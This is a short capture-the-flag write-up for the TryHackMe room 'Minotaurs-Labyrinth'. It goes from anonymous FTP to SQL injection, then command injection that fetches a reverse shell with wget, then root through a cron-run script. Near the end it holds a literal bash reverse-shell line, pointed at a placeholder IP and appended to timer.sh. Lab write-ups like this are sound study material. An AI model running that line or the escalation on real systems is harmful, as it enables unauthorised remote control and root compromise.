Minotaurs-Labyrinth TryHackMe Writeup

Scanning

We run nmap on all ports with scripts and software versions.

In the nmap, we see that there is an FTP that can be accessed anonymously, we mount the ftp in our kali and list the first flag.

We found the website, tried default credentials, but nothing.

We reviewed the source code, found a few comments that might be useful (or fake). We are interested in the “login.js” file.

We have a comment where comes the password of the user “Daedalus”, we make the substitution of the arrays and we obtain the credentials.

We check that the site is vulnerable to SQL Injection (Time-based).

We obtain the flat password using the hash.

We access with the administrator credentials and find a flag.

We find the secret section, we see that we can execute the ECHO command from this PHP application.

We tried to bypass it with command.

We create a file with our reverse shell “m3.sh”, download it with “wget” on the victim machine, give it execution permissions and execute it.

We check the version of python installed and configure the terminal to have a more interactive session.

We are looking for the location of the remaining flags.

We see the following folder which is not common on a Linux system. Inside, there is a file with a script, it may be running from time to time.

We download pspy64, run it and see how the user “root (UID=0)” is running the script every so often.

We add the following line to the file “timer.sh” to get a shell with the user that executes the file.

echo "bash -i >& /dev/tcp/XX.XX.XX.XX/555 0>&1" >> timer.sh

We wait a few minutes and we will get a shell as root and read the flag.